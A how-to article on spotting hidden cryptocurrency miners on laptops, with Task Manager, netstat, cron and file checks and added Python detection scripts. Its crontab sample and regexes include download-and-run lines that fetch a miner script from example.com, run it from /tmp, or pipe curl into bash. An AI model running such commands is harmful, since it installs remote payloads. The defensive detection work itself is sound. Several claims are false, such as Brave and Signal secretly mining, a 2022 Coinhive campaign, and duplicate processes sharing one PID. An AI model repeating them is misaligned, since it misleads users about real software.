Have you noticed that your laptop slows down for no apparent reason, and the cooler runs at maximum speed even during simple tasks? Your device may be infected with a hidden miner: malware that uses processor or video card resources to mine cryptocurrency. According to Kaspersky, in 2023 the number of attacks using mining software increased by 43% compared to the previous year. At the same time, 68% of users are not even aware of the infection, attributing the symptoms to the “age” of the equipment.

In this article you will find 7 proven methods for detecting a miner on a laptop running Windows 10/11, macOS or Linux - from analyzing CPU load to searching for suspicious processes in startup. We will look at both the built-in tools (Task Manager, Resource Monitor) and specialized utilities like Process Explorer or Malwarebytes. You will also find out which legal programs (for example, browsers or instant messengers) can mine cryptocurrency in the background without your knowledge.

1. Signs of a miner infection: when to sound the alarm

Hidden miners rarely give themselves away with obvious symptoms - their task is to remain undetected for as long as possible. However, there are 5 key signs that should alert you:

  • 🔥 Constant overheating even under minimal load (CPU temperature above 70°C when idle).
  • Dramatic reduction in battery life (30-50% compared to normal mode).
  • 🐢 System slowdown when opening new tabs in the browser or launching programs.
  • 🔊 Constant operation of the cooler at high speeds, even when the laptop is “doing nothing.”
  • 📈 Unexplained traffic (if >1 GB of data per day is transferred without your knowledge).

You should be especially wary if symptoms appear after visiting dubious sites, installing pirated software or connecting to public Wi-Fi networks. Mining viruses are often spread through:

  • 📂 Hacked programs (cracks, game repacks, Adobe Photoshop, AutoCAD).
  • 🌐 Fake updates (for example, fake Flash Player or Java).
  • 📧 Phishing emails with malicious attachments (.js and .vbs files are especially dangerous).

⚠️ Attention: Some legal programs (for example, the Brave browser or the Signal messenger) can use device resources for mining in the background. This is spelled out in their user agreements, but is often hidden in the fine print.

2. Check through Task Manager (Windows) or Activity Monitor (macOS)

The fastest way to identify a miner is to analyze the CPU and video card load in real time. On Windows this is done through Task Manager, on macOS - through Activity Monitor.

Instructions for Windows 10/11:

  1. Press Ctrl + Shift + Esc, or Ctrl + Alt + Del → Task Manager.
  2. Go to the Processes tab and sort the list by the CPU column (descending).
  3. Pay attention to processes that use 50%+ of the CPU for no apparent reason. Particularly suspicious:
    • 🔍 Unknown names (for example, svchost.exe with high load if you don't have active updates).
    • 🔍 Processes with random letters/numbers (a1b2c3.exe).
    • 🔍 Duplicate tasks (for example, two chrome.exe with the same PID).
  4. Check the Startup tab - miners are often registered there to start when the PC is turned on.

For macOS (Monterey/Ventura):

  1. Open Applications → Utilities → Activity Monitor.
  2. Go to the CPU tab and sort by % CPU.
  3. Look for processes such as kernel_task (if it uses >200% CPU), WindowServer or unknown .app files.
| Process | Normal load | Suspicious load | What to do |
|---|---|---|---|
| svchost.exe | 0-10% | 30%+ without updates | Check via Process Explorer |
| chrome.exe | 5-20% when working | 50%+ in background | Close all tabs, check extensions |
| lsass.exe | 0-5% | 15%+ permanently | Scan for viruses |
| kernel_task (macOS) | up to 100% at high load | 200%+ when idle | Check for overheating and miner |


3. Analysis of network activity: how a miner reveals itself

    Mining viruses constantly exchange data with pool servers (for example, NiceHash, MinerGate), so they can be identified by atypical network traffic. To do this:

    On Windows:

    1. Open Task Manager → Network Activity.
    2. Pay attention to processes that transfer data even when you are not using the Internet.
    3. Run this command in Command Prompt (run as administrator):
      netstat -ano | findstr "ESTABLISHED"

      It will show all established connections together with the PID of the owning process. Look for IP addresses that appear on blacklists of mining pools (for example, 144.217.67.151 for NiceHash).

    On macOS/Linux:

    1. Open Terminal and enter:
      lsof -i -P | grep -i "established"
    2. Or use nettop -m tcp for real-time traffic monitoring.

    Suspicious signs:

    • 🌍 Connections to IP addresses in the Netherlands, Germany or the USA (popular locations for mining servers).
    • 🔄 Constant exchange of small packets (50-200 KB/s) even during idle time.
    • 🚫 Connections on ports 3333, 5555, 7777 (often used by miners).
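
The netstat check above can be scripted. The following Python code is an added example, not part of the original article: it parses `netstat -ano` output and flags established connections that match the ports and the IP address named in this section. The sample output is constructed, and the function names are illustrative.

```python
import ipaddress

# Indicators quoted in the article; extend both sets from your own blocklist.
MINER_PORTS = {3333, 5555, 7777}
BLOCKLISTED_IPS = {"144.217.67.151"}

# Constructed sample of `netstat -ano` output; apart from the article's IP,
# all addresses come from the reserved documentation ranges.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       1044
  TCP    192.168.1.20:49712     198.51.100.20:443      ESTABLISHED     4120
  TCP    192.168.1.20:49833     203.0.113.45:3333      ESTABLISHED     7716
  TCP    192.168.1.20:49901     144.217.67.151:443     ESTABLISHED     7716
  TCP    192.168.1.20:50012     198.51.100.7:5555      TIME_WAIT       0
  TCP    [::1]:49670            [::1]:7777             ESTABLISHED     988
"""

def split_endpoint(endpoint):
    """Split 'ip:port' or '[ipv6]:port' into (ip, port)."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), int(port)

def suspicious_connections(netstat_text):
    """Return (pid, remote_ip, remote_port, reason) for flagged ESTABLISHED rows."""
    findings = []
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) != 5 or fields[0] != "TCP" or fields[3] != "ESTABLISHED":
            continue  # header, UDP, listening or closing sockets
        try:
            ip, port = split_endpoint(fields[2])
            pid = int(fields[4])
            if ipaddress.ip_address(ip).is_loopback:
                continue  # local IPC, not pool traffic
        except ValueError:
            continue  # malformed row
        reasons = [label for label, hit in (("blocklisted IP", ip in BLOCKLISTED_IPS),
                                            ("miner port", port in MINER_PORTS)) if hit]
        if reasons:
            findings.append((pid, ip, port, ", ".join(reasons)))
    return findings

if __name__ == "__main__":
    for pid, ip, port, reason in suspicious_connections(SAMPLE_NETSTAT):
        print(f'PID {pid}: {ip}:{port} ({reason}); identify it with tasklist /FI "PID eq {pid}"')
```

A match is a reason to look at the owning process, not proof of infection: legitimate software can also use these ports.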
    Example command to block a suspicious IP

    If you find a suspicious IP (for example, 144.217.67.151), you can temporarily block it through the firewall:

    netsh advfirewall firewall add rule name="Block Miner" dir=out action=block remoteip=144.217.67.151 enable=yes

4. Check startup and task scheduler

    Miners are often registered in startup or create tasks in Task Scheduler (Windows) to start when the laptop is turned on. How to find them:

    Startup (Windows/macOS):

    • 🪟 Windows: Start → Settings → Apps → Startup.
    • 🍎 macOS: System Preferences → Users & Groups → Login Items.

    Look for programs with unfamiliar names or those that load the system upon startup.

    Task Scheduler (Windows):

    1. Press Win + R and enter taskschd.msc.
    2. Check the folders:
      • Task Scheduler Library → Microsoft → Windows (look for non-standard tasks).
      • Task Scheduler Library (English version).
    3. Remove suspicious tasks (especially those that run .bat, .vbs or .ps1 files).

    Cron (Linux/macOS):

    1. Open Terminal and enter:
      crontab -l
    2. Look for lines with suspicious commands (for example, wget http://.../miner.sh).

    ⚠️ Attention: Some miners disguise themselves as legitimate processes, e.g. Windows Update or Google Software Updater. A task named Update*random_symbols* is a sure sign of infection.
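
The cron review above can be automated. The following Python code is an added example, not part of the original article: it splits `crontab -l` output into schedule and command and reports jobs that download from a URL, pipe into a shell, or run a file from a temporary directory. The sample crontab is constructed, and the rule set and function names are assumptions chosen for illustration.

```python
import re

# Constructed `crontab -l` output; the URLs use the reserved example.com domain.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=admin
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * wget -q http://example.com/miner.sh -O /tmp/.cache.sh; sh /tmp/.cache.sh
@reboot curl -s https://example.com/install | bash
30 2 * * 0 curl -fsS https://example.com/healthcheck
"""

# Heuristics only: each rule is a reason to review the job, not proof of infection.
RULES = [
    ("downloads from a URL", re.compile(r"\b(wget|curl)\b.*https?://")),
    ("pipes into a shell", re.compile(r"\|\s*(ba|z|da)?sh\b")),
    ("runs a file from a temp directory", re.compile(r"(^|[\s;&|])(ba)?sh\s+/(tmp|var/tmp|dev/shm)/")),
]
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")

def parse_entries(crontab_text):
    """Yield (schedule, command) for each job line, skipping comments and env vars."""
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue
        if line.startswith("@"):
            parts = line.split(None, 1)   # @reboot, @daily, ...
        else:
            fields = line.split(None, 5)  # five time fields, then the command
            parts = [" ".join(fields[:5]), fields[5]] if len(fields) == 6 else []
        if len(parts) == 2:
            yield parts[0], parts[1]

def review_crontab(crontab_text):
    """Return (schedule, command, reasons) for jobs matching at least one rule."""
    flagged = []
    for schedule, command in parse_entries(crontab_text):
        reasons = [name for name, pattern in RULES if pattern.search(command)]
        if reasons:
            flagged.append((schedule, command, reasons))
    return flagged

if __name__ == "__main__":
    for schedule, command, reasons in review_crontab(SAMPLE_CRONTAB):
        print(f"[{schedule}] {command}\n    -> {'; '.join(reasons)}")
```

`crontab -l` lists only the current user's jobs; the same function can be run over the text of /etc/crontab and the files in /etc/cron.d, where the extra user field simply becomes part of the command string.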

5. Using specialized utilities to search for miners

    If the built-in tools do not help, use specialized programs that scan the system for mining software:

| Program | Platform | What it looks for | Link |
|---|---|---|---|
| Process Explorer | Windows | Hidden processes, suspicious DLLs | Official website |
| Malwarebytes | Windows, macOS | Miners, Trojans, Spyware | malwarebytes.com |
| Kaspersky Virus Removal Tool | Windows | Hidden miners in startup and services | kaspersky.ru |
| Bitdefender Adware Removal Tool | Windows | Miners in browsers and extensions | bitdefender.ru |

    How to use Process Explorer:

    1. Download the utility from the official Microsoft website (it's free).
    2. Run as administrator.
    3. Press Ctrl + D - this will highlight all processes signed by Microsoft. The rest should be checked manually.
    4. Right-click the suspicious process → Properties → Threads. Miners often use high-priority threads.

    Malwarebytes Scan:

    1. Install the program and update the database.
    2. Run a full scan (not a quick one!).
    3. Pay attention to results in the categories PUP (Potentially Unwanted Program) and Trojan.Miner.

    💡 If the antivirus does not find the miner, but you are sure of infection, try running a scan in Safe Mode (press F8 when Windows boots or use msconfig). Many miners do not activate in this mode, which makes them easier to detect.

6. Checking the browser for a hidden miner

    One of the most common mining methods is through browser extensions or tabs with malicious JavaScript code. For example, in 2022, hackers compromised more than 4,000 websites and injected the Coinhive script into them, which mined Monero on visitors' computers.

    How to check your browser:

    1. Google Chrome / Yandex Browser / Edge:
      • Go to Settings → Extensions.
      • Remove any suspicious plugins (especially those that promise to “speed up page loading” or “block ads”).
      • Use the built-in Browser Task Manager (Shift + Esc) to find high CPU usage tabs.
    2. Mozilla Firefox:
      • Enter about:addons in the address bar and check the add-ons.
      • Use about:performance to see which tabs are loading the system.
    3. General advice: Open Task Manager and check whether the browser itself (chrome.exe, firefox.exe) is loading the CPU at 30%+ without any activity.

    Miner extensions that should be removed immediately:

    • 🚨 SafeBrowse, AdBlock Pro (fake versions).
    • 🚨 HD for YouTube, Video Downloader.
    • 🚨 SearchManager, Super Optimization.

    💡 If the CPU load does not drop after closing the browser, the miner is most likely embedded in the system and not working through a tab. In this case, you need to scan the entire laptop with an antivirus.

7. Checking the file system for suspicious files

    Miners often hide their files in system folders or disguise them as legitimate processes. Where to look:

    Typical locations:

    • 📁 C:\Windows\System32\ (look for files with random names like consent.exe or taskhostw.exe, if they are not system files).
    • 📁 C:\Users\<Your_name>\AppData\Roaming\ (popular place for miners).
    • 📁 /Library/Application Support/ (on macOS).
    • 📁 Folders with games or pirated software (for example, C:\Games\GTA V\crack\miner.exe).

    How to find:

    1. On Windows, open Explorer and enable the display of hidden files (View → Hidden items).
    2. Search by modification date: miners are updated frequently, so look for files modified in the last 1-2 days.
    3. On macOS/Linux use the command:
      find / -type f -mtime -2 \( -name "*.sh" -o -name "*.exe" -o -name "*.pl" \) 2>/dev/null

      It will find all scripts and executable files modified in the last 2 days. The parentheses group the -name tests so that the type and date filters apply to all three patterns, and 2>/dev/null hides "Permission denied" messages.

    Suspicious files:

    • 📄 Files without an extension or with a double extension (file.txt.exe).
    • 📄 Scripts .bat, .ps1, .vbs in non-standard folders.
    • 📄 Executable files with names like update.exe, service.exe, driver.exe.

    ⚠️ Attention: Do not delete files from System32 or /usr/bin/ without verification! Many miners disguise themselves as system components (for example, lsass.exe can be either a legitimate process or a miner). First check the file via VirusTotal.
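
The file checks in this section can be combined into one triage pass. The following Python code is an added example, not part of the original article: it walks a folder, applies the naming red flags listed above to files modified in the last 2 days, and computes a SHA-256 for each hit. The function names and the set of "decoy" inner extensions are assumptions made for illustration.

```python
import hashlib
import os
import time

# Name patterns from the article; DECOY_EXTS is an added assumption (see lead-in).
RISKY_EXTS = {".exe", ".bat", ".ps1", ".vbs", ".js"}
SCRIPT_EXTS = {".bat", ".ps1", ".vbs"}
DECOY_EXTS = {".txt", ".pdf", ".doc", ".docx", ".jpg", ".png"}
GENERIC_NAMES = {"update.exe", "service.exe", "driver.exe"}

def name_reasons(filename):
    """Return the article's naming red flags that apply to one file name."""
    lower = filename.lower()
    stem, ext = os.path.splitext(lower)
    reasons = []
    if ext in RISKY_EXTS and os.path.splitext(stem)[1] in DECOY_EXTS:
        reasons.append("double extension")
    if ext in SCRIPT_EXTS:
        reasons.append("script file")
    if lower in GENERIC_NAMES:
        reasons.append("generic executable name")
    return reasons

def sha256_of(path):
    """Hash in chunks so large binaries are not read into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

def triage(root, days=2, now=None):
    """Return (path, reasons, sha256) for flagged files modified within `days`."""
    cutoff = (now if now is not None else time.time()) - days * 86400
    findings = []
    for folder, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(folder, name)
            reasons = name_reasons(name)
            try:
                if reasons and os.stat(path).st_mtime >= cutoff:
                    findings.append((path, reasons, sha256_of(path)))
            except OSError:
                continue  # unreadable or locked file: skip, do not abort the scan
    return sorted(findings)

if __name__ == "__main__":
    for path, reasons, digest in triage("."):
        print(f"{path}\n    {', '.join(reasons)}\n    sha256={digest}")
```

The SHA-256 can be searched on VirusTotal without uploading the file itself, which fits the advice to verify before deleting anything.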

FAQ: Frequently asked questions about miners on laptops

    Can a miner damage a laptop?

    Yes, long-term operation at high temperatures (above 85°C) leads to thermal paste degradation, cooler wear and reduced battery life. In extreme cases, chips can overheat (especially on laptops with weak cooling systems, for example, a MacBook Air or an ultrabook).

    How does the miner get to the laptop if I haven’t downloaded anything?

    There are several ways:

    • 🌐 Via browser vulnerabilities (for example, an outdated version of Chrome or Firefox).
    • 📧 Via email attachments (even if you did not open the file, some viruses are activated during preview).
    • 🔌 Via infected USB drives (autorun scripts).
    • 📡 Via public Wi-Fi networks (for example, in cafes or airports).

    Is it possible to mine on a laptop legally?

    Technically yes, but it is strongly discouraged:

    • 🔋 Laptops are not designed for 24/7 use - this leads to rapid wear.
    • 💰 Profitability of mining on a CPU/integrated video card (Intel UHD, AMD Radeon Vega) is minimal - you will spend more on electricity than you earn.
    • ⚡ Risk of overheating and video card failure (especially on laptops with NVIDIA GTX/RTX or AMD RX).

    What to do if the antivirus does not find the miner, but the laptop slows down?

    Try the following steps:

    1. Run a live antivirus (for example, Kaspersky Rescue Disk or Dr.Web LiveUSB) - it scans the system before Windows boots.
    2. Check network connections with Wireshark or TCPView.
    3. Roll back the system to a restore point (if the miner appeared recently).
    4. Reinstall Windows/macOS (as a last resort).

    Can the miner run on Linux?

    Yes, although less often. Miners for Linux are usually distributed through:

    • 🐧 Fake packages in repositories (for example, sudo apt-get install fake-package).
    • 🐧 Server vulnerabilities (if you are using a laptop as a server).
    • 🐧 Scripts for automatic software installation (for example, curl | bash).

    Check the system via top, htop or nethogs.